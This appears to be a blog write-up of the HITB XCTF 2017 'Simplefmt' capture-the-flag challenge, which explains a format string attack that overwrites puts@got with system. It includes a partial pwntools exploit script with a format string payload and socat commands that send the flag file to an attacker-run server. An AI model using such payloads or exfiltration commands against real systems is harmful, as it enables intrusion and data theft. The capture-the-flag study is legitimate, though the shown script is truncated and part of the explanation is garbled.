HITB XCTF 2017 PWN Simplefmt Write-up


Points: 869 Solved: 4

This is a simple challenge that contains a format string vulnerability.

Vulnerability Analysis

The trick in this challenge is ‘‘ symbol. In format string, ‘‘ can be used to denote the space before output. So we can use ‘*’ symbol to reflect the value of  __libc_start_main in string length. After adding a fixed offset, we can save the value of system into puts@got.plt.

printf("A%*d", 5, 10);
//output:A     10
//5 spaces there

Another problem in this challenge is that the program closed stdin and stdout after the format string vulnerability. So we cannot directly get the shell and we have to cat the flag to a remote server to get the flag as following:

#on attacker's server:
socat TCP4-LISTEN:31337 OPEN:inputfile,creat,append
#on target server:
cat flag | socat - TCP4:


from pwn import *

libc = ELF("./simplefmt_new");
DEBUG = int(sys.argv[1]);
if(DEBUG == 0):
    r = remote();
elif(DEBUG == 1):
    r = process("./simplefmt");
elif(DEBUG == 2):
    r = process("./simplefmt");
    gdb.attach(r,  '''source ./script''');

def exploit():
    r.send("127"+ "\x00"*5 + p32(0x601018));
    libc = ELF("./libc.so.6");
    systemRelAddr = libc.symbols["system"];
    startRelAddr = libc.symbols["__libc_start_main"];
    log.info("system address: 0x%x" % systemRelAddr);
    log.info("start address: 0x%x" % startRelAddr);
    log.info(r.recvuntil("Input your string:"));
    payload = "cat flag | socat - TCP4:;";
    log.info("commands length: 0x%x" % len(payload));
    payload += "%150240c%08x%08x%08x%08x%08x%08x%08x%08x%08x%08x%08x%*x%9$n";


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.